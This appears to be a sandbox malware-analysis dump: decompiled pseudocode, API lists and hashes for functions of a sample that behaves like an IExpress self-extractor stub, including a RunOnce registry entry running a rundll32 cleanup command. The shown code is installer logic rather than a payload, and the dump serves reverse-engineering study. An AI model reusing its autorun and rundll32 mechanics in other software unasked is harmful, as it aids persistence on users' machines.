                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E001F4FE0, 0, 0, 0x1f8798);
                                                                                                                                                                                                        					 *0x1f879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E001F44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0x1f858c);
                                                                                                                                                                                                        					_t38 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        					_t25 = E001F44B9(_t38, 0x4b2, 0x1f1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0x1f91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0x1f858c);
                                                                                                                                                                                                        						_t39 =  *0x1f879c; // 0x0
                                                                                                                                                                                                        						E001F3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0x1f858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0x1f879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 001F3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 001F3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 001F355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(001F1140,00000000,00000020,00000004), ref: 001F3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 001F35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 001F35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 001F3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 001F3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 001F3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 001F3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: cb9f5de2bf6db8139fa10fe9005e55d258bc8b9b88af398a9701e29cdf3fdf4a
                                                                                                                                                                                                        • Instruction ID: ff40693aa9b5e763f100af8ba08bef16f4923b3dcc31ccfecf0256033df2fcc8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9f5de2bf6db8139fa10fe9005e55d258bc8b9b88af398a9701e29cdf3fdf4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F331D2B0244309BBD7205F24EC4DE3B3A69EBC5B20F544529F72AD5AB0CB758A80CA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E001F4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E001F44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0x1f88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0x1f87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0x1f8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E001F4200;
                                                                                                                                                                                                        					_v28 = 0x1f88c0;
                                                                                                                                                                                                        					 *0x1fa288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0x1fa288(_t32, 0x1f88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0x1f88c0 != 0) {
                                                                                                                                                                                                        							E001F1680(0x1f87a0, 0x104, 0x1f88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1fa288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0x1f87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0x1f88c0);
                                                                                                                                                                                                        					_t61 = 0x1f88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0x1f88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0x1f88c0; // 0x3f1181
                                                                                                                                                                                                        					_t44 = CharPrevA(0x1f88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0x1f88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 001F4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 001F424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 001F4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 001F427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,001F88C0,?,00000001), ref: 001F429F
                                                                                                                                                                                                        • CharPrevA.USER32(001F88C0,003F1181,?,00000001), ref: 001F42C2
                                                                                                                                                                                                        • CharPrevA.USER32(001F88C0,00000000,?,00000001), ref: 001F42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001F4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001F43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 45e2fd9320e62529764362b734a56805af59173d68b2208a3418e1e214e3eb80
                                                                                                                                                                                                        • Instruction ID: b1b9f8e2a54779a18bcf261c4201fbd0bef30e9e4c8beca6107e26a92295a5ea
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45e2fd9320e62529764362b734a56805af59173d68b2208a3418e1e214e3eb80
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0441E3B4A00218AFDB11AB64EC88A7E7BB4FF49384F440169EB45A3351CF788C81C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E001F1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E001F658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E001F658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0x1f1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E001F1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(FCDC6E1A,00000000,00000000,00000000), ref: 001F27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 001F27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 001F27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001F28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001F27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: b2f13987021b10bec330e1a7b2a4010690ddd182cff8a8ddb3f6bf35d6814ec0
                                                                                                                                                                                                        • Instruction ID: f1ec42e36d7ca70d1c052d436961ad53173546263d082cfe815f3aac85742083
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2f13987021b10bec330e1a7b2a4010690ddd182cff8a8ddb3f6bf35d6814ec0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E741A0B1A0012CAFDB249B649C85AFA7BBDEF15740F4440A9F649E2110DB748EC6CFA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E001F2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0x1f8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E001F658A( &_v268, 0x104, 0x1f1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        							E001F171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001F22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 001F22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 001F236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 001F237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F2321
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 001F232D
                                                                                                                                                                                                        • wextract_cleanup2, xrefs: 001F227C, 001F22CD, 001F2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 001F2299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 3027380567-1720115735
                                                                                                                                                                                                        • Opcode ID: 81edde00839590907859318e3114e2ed123f28c60f77a4dac3372bb8c5d3cb40
                                                                                                                                                                                                        • Instruction ID: 70a890611a6e6b27ace8c9f1dee23b4289fbb4d3756fb2aed4a5e4727692d563
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81edde00839590907859318e3114e2ed123f28c60f77a4dac3372bb8c5d3cb40
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A3193B1A0021CABDB219B61DC49FFA7B7CEF59740F4001A9F64DA6051EF75AB88CA50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E001F3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0x1f8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0x1f8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E001F43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0x1f8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0x1f88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E001F30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 001F313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 001F316A
